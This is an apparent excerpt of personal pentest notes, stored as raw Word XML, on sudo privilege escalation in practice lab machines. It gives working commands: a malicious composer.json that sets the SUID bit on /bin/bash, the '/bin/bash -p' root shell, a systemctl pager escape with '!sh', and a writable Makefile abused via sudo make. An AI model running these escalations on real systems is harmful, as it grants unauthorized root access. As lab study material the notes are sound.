    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F7F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F80">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This was in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId666">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">LaVita</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice and we saw we had sudo privs for /usr/bin/composer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F81">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2603500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="509" name="image492.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image492.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId667"/>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1F82">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="529"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/composer -working-dir\=/var/ww/html/lavita *</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F83">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F84">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We see there is an entry in GTFOBins, but we need to do a little bit of stuff on our own first, like creating a malicious .json file to replace the original composer.json file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F85">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F86">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="894"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd /var/www/html/lavita</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F87">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="894"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Go to the directory where composer.json is supposed to be, according to the sudo command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F88">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="894"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mv composer.json composer.json.original</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F89">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="894"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Rename the original composer.json</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F8A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="894"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo '{"scripts":{"x":"chmod +s /bin/bash"}}' &gt; composer.json</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F8B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="894"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This adds the SUID bit to /bin/bash since this runs as root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F8C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="894"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -u root /usr/bin/composer --working-dir\=/var/www/html/lavita run-script x</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F8D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="894"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is the command from GTFOBins but modified to match our situation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F8E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="894"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And now check /bin/bash and get root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F8F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="894"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/bash -p</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F90">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F91">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F92">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_koeioe15l8m2" w:id="270"/>
      <w:bookmarkEnd w:id="270"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/systemctl</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F93">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F94">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId668">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Scrutiny</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice, we saw this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F95">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1358900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="348" name="image346.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image346.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId66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1F96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="312"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/systemctl status teamcity-server.service</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F97">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F98">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3733800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="157" name="image151.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image151.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId670"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3733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1F99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="280"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Just use "sudo" to run what "sudo -l" gives us, then once in the pager, run "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">!sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">".</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F9A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="280"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1181100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="474" name="image465.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image465.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId671"/>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1F9B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="280"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo /usr/bin/systemctl status teamcity-server.service</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F9C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="280"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">!sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F9D">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F9E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_mj5t3pc2hpoe" w:id="271"/>
      <w:bookmarkEnd w:id="271"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/make</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F9F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FA0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the SPX PG Practice, we saw this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FA1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1104900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="409" name="image403.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image403.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId672"/>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1FA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="179"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/make install -C /home/profiler/php-spx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FA3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="179"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Basically:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Run the installation process defined in the Makefile inside /home/profiler/php-sp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FA4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="179"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">install</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> = copy the compiled files into system directories (e.g., /usr/local/bin, /usr/lib, etc.) so the software is "installed."</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FA5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="179"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here, you’re telling make: run the install instructions defined in the Makefile.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FA6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="179"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-C </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">option means "change to this directory before running".</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="179"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So instead of looking in the current directory for a Makefile, make will go into /home/profiler/php-spx, and run the install target defined there.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FA8">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FA9">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But, all we have to know is that there is likely a Makefile inside of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/home/profiler/php-spx </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and we checked and we can actually modify it! So, we can either create a malicious one, or edit the original code to make it do something like run our own binary instead of running another binary</w:t>
      </w:r>
    </w:p>
